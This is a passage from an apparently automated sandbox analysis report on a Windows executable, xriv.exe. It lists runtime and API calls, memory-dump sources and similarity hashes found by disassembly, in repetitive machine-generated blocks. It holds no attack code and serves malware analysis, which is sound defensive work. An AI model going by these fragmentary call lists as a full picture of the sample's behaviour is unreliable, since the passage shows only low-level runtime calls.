                                                                      • InternetCloseHandle.WININET(?), ref: 011D89D7
                                                                      • InternetCloseHandle.WININET(?), ref: 011D89DF
                                                                      • InternetCloseHandle.WININET(?), ref: 011D89E7
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                      • String ID:
                                                                      • API String ID: 1354133546-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                      • String ID:
                                                                      • API String ID: 3409252457-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 011E85A7
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 011E85AF
                                                                      • _ValidateLocalCookies.LIBCMT ref: 011E8638
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 011E8663
                                                                      • _ValidateLocalCookies.LIBCMT ref: 011E86B8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 0-537541572
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 011F1405: _free.LIBCMT ref: 011F142A
                                                                      • _free.LIBCMT ref: 011F148B
                                                                        • Part of subcall function 011ED653: HeapFree.KERNEL32(00000000,00000000,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?), ref: 011ED669
                                                                        • Part of subcall function 011ED653: GetLastError.KERNEL32(?,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?,?), ref: 011ED67B
                                                                      • _free.LIBCMT ref: 011F1496
                                                                      • _free.LIBCMT ref: 011F14A1
                                                                      • _free.LIBCMT ref: 011F14F5
                                                                      • _free.LIBCMT ref: 011F1500
                                                                      • _free.LIBCMT ref: 011F150B
                                                                      • _free.LIBCMT ref: 011F1516
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(?,011D5140,00000000), ref: 011F2B40
                                                                      • __fassign.LIBCMT ref: 011F2D1F
                                                                      • __fassign.LIBCMT ref: 011F2D3C
                                                                      • WriteFile.KERNEL32(?,011D5140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F2D84
                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 011F2DC4
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F2E70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                      • String ID:
                                                                      • API String ID: 4031098158-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,011E8887,011E8476,011E7AC4), ref: 011E889E
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 011E88AC
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 011E88C5
                                                                      • SetLastError.KERNEL32(00000000,011E8887,011E8476,011E7AC4), ref: 011E8917
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 011F0033
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      • API String ID: 0-2325939117
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wcsrchr
                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                      • API String ID: 1752292252-4019086052
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: api-ms-
                                                                      • API String ID: 0-2084034818
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,011EA9D8,011EE000,?,011EA9A0,011EAF26,?,011EE000), ref: 011EA9F8
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 011EAA0B
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,011EA9D8,011EE000,?,011EA9A0,011EAF26,?,011EE000), ref: 011EAA2E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,011EB0E0), ref: 011EB1D0
                                                                      • GetFileInformationByHandle.KERNEL32(?,?), ref: 011EB22A
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,011EB0E0,?,000000FF,00000000,00000000), ref: 011EB2B8
                                                                      • __dosmaperr.LIBCMT ref: 011EB2BF
                                                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 011EB2FC
                                                                        • Part of subcall function 011EB524: __dosmaperr.LIBCMT ref: 011EB559
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                      • String ID:
                                                                      • API String ID: 1206951868-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 011F13B4
                                                                        • Part of subcall function 011ED653: HeapFree.KERNEL32(00000000,00000000,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?), ref: 011ED669
                                                                        • Part of subcall function 011ED653: GetLastError.KERNEL32(?,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?,?), ref: 011ED67B
                                                                      • _free.LIBCMT ref: 011F13C6
                                                                      • _free.LIBCMT ref: 011F13D8
                                                                      • _free.LIBCMT ref: 011F13EA
                                                                      • _free.LIBCMT ref: 011F13FC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID: *?
                                                                      • API String ID: 269201875-2564092906
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 011E8FA2
                                                                      • CatchIt.LIBVCRUNTIME ref: 011E9088
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CatchEncodePointer
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 1435073870-2084237596
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID:
                                                                      • API String ID: 1740715915-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(0000011C,?,9BC7B195,00000000), ref: 011D4D89
                                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011D4DF0
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 011D4DF7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProcVersion
                                                                      • String ID:
                                                                      • API String ID: 3310240892-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 011F509E
                                                                      • _free.LIBCMT ref: 011F50C7
                                                                      • SetEndOfFile.KERNEL32(00000000,011F25FD,00000000,011ED4F0,?,?,?,?,?,?,?,011F25FD,011ED4F0,00000000), ref: 011F50F9
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,011F25FD,011ED4F0,00000000,?,?,?,?,00000000), ref: 011F5115
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 1547350101-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 011EAE0F: _free.LIBCMT ref: 011EAE1D
                                                                        • Part of subcall function 011F0971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,011F4B40,?,00000000,00000000), ref: 011F0A13
                                                                      • GetLastError.KERNEL32 ref: 011EFA02
                                                                      • __dosmaperr.LIBCMT ref: 011EFA09
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 011EFA48
                                                                      • __dosmaperr.LIBCMT ref: 011EFA4F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                      • String ID:
                                                                      • API String ID: 167067550-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,00000000,?,011EAD8D,00000000,?,?,?,011EAF26,?), ref: 011EDF49
                                                                      • _free.LIBCMT ref: 011EDFA6
                                                                      • _free.LIBCMT ref: 011EDFDC
                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,011EAF26,?), ref: 011EDFE7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast_free
                                                                      • String ID:
                                                                      • API String ID: 2283115069-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,011EB7F5,011EDB7F,?,?,011E8272,?,?,?,?,?,011D20C3,?,?), ref: 011EE0A0
                                                                      • _free.LIBCMT ref: 011EE0FD
                                                                      • _free.LIBCMT ref: 011EE133
                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,011E8272,?,?,?,?,?,011D20C3,?,?), ref: 011EE13E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast_free
                                                                      • String ID:
                                                                      • API String ID: 2283115069-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,011EE9E2,00000000,?,011F370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 011EE893
                                                                      • GetLastError.KERNEL32(?,011F370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,011EE9E2,00000000,00000104,?), ref: 011EE89D
                                                                      • __dosmaperr.LIBCMT ref: 011EE8A4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2398240785-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,011EE9E2,00000000,?,011F3695,00000000,00000000,011EE9E2,?,?,00000000,00000000,00000001), ref: 011EE8FC
                                                                      • GetLastError.KERNEL32(?,011F3695,00000000,00000000,011EE9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,011EE9E2,00000000,00000104), ref: 011EE906
                                                                      • __dosmaperr.LIBCMT ref: 011EE90D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2398240785-0
                                                                      • Opcode ID: 1f53d005e0083d911dc42c2a13e89fa121867a03f06f6d91ba77024fe4689651
                                                                      • Instruction ID: 7fb4c3196de7f4f11537b1e9bc0ecee27bda8b2f147da9a2cf14a4facd81374a
                                                                      • Opcode Fuzzy Hash: 1f53d005e0083d911dc42c2a13e89fa121867a03f06f6d91ba77024fe4689651
                                                                      • Instruction Fuzzy Hash: 4AF08132601916BB8B381FE6D84C946BFEAFF442A03054528F62DC6520E731E861CBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WriteConsoleW.KERNEL32(011D5140,0000000F,012068F8,00000000,011D5140,?,011F5AA7,011D5140,00000001,011D5140,011D5140,?,011F2ECD,00000000,?,011D5140), ref: 011F63A6
                                                                      • GetLastError.KERNEL32(?,011F5AA7,011D5140,00000001,011D5140,011D5140,?,011F2ECD,00000000,?,011D5140,00000000,011D5140,?,011F3421,011D5140), ref: 011F63B2
                                                                        • Part of subcall function 011F6378: CloseHandle.KERNEL32(FFFFFFFE,011F63C2,?,011F5AA7,011D5140,00000001,011D5140,011D5140,?,011F2ECD,00000000,?,011D5140,00000000,011D5140), ref: 011F6388
                                                                      • ___initconout.LIBCMT ref: 011F63C2
                                                                        • Part of subcall function 011F633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,011F6369,011F5A94,011D5140,?,011F2ECD,00000000,?,011D5140,00000000), ref: 011F634D
                                                                      • WriteConsoleW.KERNEL32(011D5140,0000000F,012068F8,00000000,?,011F5AA7,011D5140,00000001,011D5140,011D5140,?,011F2ECD,00000000,?,011D5140,00000000), ref: 011F63D7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
